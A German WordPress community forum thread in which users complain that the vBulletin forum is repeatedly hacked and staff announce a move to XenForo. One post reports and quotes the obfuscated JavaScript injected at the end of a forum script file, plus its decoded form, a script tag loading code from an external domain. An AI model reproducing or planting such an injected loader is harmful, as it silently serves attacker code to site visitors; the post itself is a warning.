Weitere Informationen und den Download findest du auf der offiziellen Anlaufstelle de.wordpress.org
Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 16
Like Tree6Likes

Thema: Forum total verseucht

Edi
    Edi ist offline
    PostRank: 10 Avatar von Edi

Forum total verseucht

Mittlerweile ist das Forum total verseucht...

Ich bin dann mal weg, bis es wieder vernünftig verwendet werden kann.
    TmoWizard and FloRet like this.

PostRank: 6
    Hallo,

Mit diesen Gedanken spiele ich auch schon seit einiger Zeit!
    Keine SSL Verschlüsselung, dauernde Kaspersky Meldungen zu irgendwelchen Dubiosen Scripten!

Das macht keinen Spaß mehr!!
    Auch die Rückmeldungen seitens des Betreibers sind ernüchternd mangelhaft!

WANN, kommt die neue Forensoftware? WANN kommt ein SSL Zertifikat? WANN.....

Beste grüße

WPDE-Moderator Avatar von maxe
    den Gedanken hatte ich tatsächlich auch schon mal (öfter), von daher total verständlich.
    Bitte immer zuerst die Suchmaschine Deines Vertrauens nutzen, dann die FAQ und die Forensuche, und erst danach Deine Fragen hier im Forum stellen, denn sehr vieles wurde schon mehrfach beantwortet. Bitte dabei auch die Forenregeln beachten.

Wenn du eine weise Antwort verlangst, musst du vernünftig fragen. (Johann Wolfgang von Goethe)

WPDE-Team Avatar von Olaf
    Ich kann jeden verstehen den die Situation nervt, geht mir genau so und ich hoffe in Kürze eine Lösung anbieten zu können. Der technische Admin ist mitunter schwer zu erreichen, aber derzeit wird zügig auf einen neuen Hack reagiert. Kern des Problems ist vB und demnächst satteln wir auf XenForo um. Erste Tests stehen an und sobald die Feiertage durch sind gehts an die finale Migration. Ich bitte euch um noch ein wenig Geduld...

Vielen Dank und beste Grüsse
    Olaf

PostRank: 10 Avatar von JABA-Hosting
    Zitat Zitat von Olaf Beitrag anzeigen
    Ich kann jeden verstehen den die Situation nervt, geht mir genau so und ich hoffe in Kürze eine Lösung anbieten zu können. Der technische Admin ist mitunter schwer zu erreichen, aber derzeit wird zügig auf einen neuen Hack reagiert. Kern des Problems ist vB und demnächst satteln wir auf XenForo um. Erste Tests stehen an und sobald die Feiertage durch sind gehts an die finale Migration. Ich bitte euch um noch ein wenig Geduld...

Vielen Dank und beste Grüsse
    Olaf
    Es gibt doch hier jede Menge Firmen die die Migration doch übernehmen könnten.
    Edi likes this.

WPD-Moderator Avatar von Alphawolf
    Zitat Zitat von Olaf Beitrag anzeigen
    Kern des Problems ist vB und demnächst satteln wir auf XenForo um.
    Ich würde eher auf Discourse gehen, wofür es auch Importer für vbulletin gibt. Finde das Discourse-System denkt das (etwas angestaubte System von Foren) am besten weiter.

Ansonsten Hallo und Frohes Fest an alle!
    wpseek.com - Die WordPress-Code-Suchmaschine

PostRank: 10 Avatar von b3317133
    Heute ist die Datei forum.wpde.org/clientscript/vbulletin_md5.js?v=425 verseucht, der Code am Ende der Datei ab var _0x142f=... verlinkt (nach "Entschlüsselung") auf ein externes Script von der Domain jurtym.cf ...
    Code:
    ... var _0x142f=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x2F\x2F\x6A\x75\x72\x74\x79\x6D\x2E\x63\x66\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];var _0xb0e7=[_0x142f[0],_0x142f[1]];var _0x2490=[_0xb0e7[0],_0xb0e7[1]];var _0x9cd3=[_0x2490[0],_0x2490[1]];var _0x2f93=[_0x9cd3[0],_0x9cd3[1]];document[_0x2f93[1]](_0x2f93[0])
    Code:
    <script src="//jurtym.cf"></script>

PostRank: 6
    Wenn bei jemandem die WP Seite verseucht ist, wird ihm geraden die Seite vom Netz zu nehmen bis der Schaden behoben ist. Sollte man dies dann in dem Fall hier nicht auch tun .

PostRank: 10 Avatar von b3317133
    Zitat Zitat von borusse Beitrag anzeigen
    Sollte man dies dann in dem Fall hier nicht auch tun .
    Aus meiner Sicht schon.

PostRank: 0
    Zitat Zitat von FloRet Beitrag anzeigen
    Hallo,

Mit diesen Gedanken spiele ich auch schon seit einiger Zeit!
    Keine SSL Verschlüsselung, dauernde Kaspersky Meldungen zu irgendwelchen Dubiosen Scripten!

Das macht keinen Spaß mehr!!
    Auch die Rückmeldungen seitens des Betreibers sind ernüchternd mangelhaft!

WANN, kommt die neue Forensoftware? WANN kommt ein SSL Zertifikat? WANN.....

Beste grüße
    Hi,

ich hatte bisher noch keine Probleme hier im Forum... bin aber auch ziemlich neu hier mit dabei.
    Ein SSL Zertifikat finde ich persönlich nicht unbedingt für ein solches Forum notwendig.

Seite 1 von 2 12 LetzteLetzte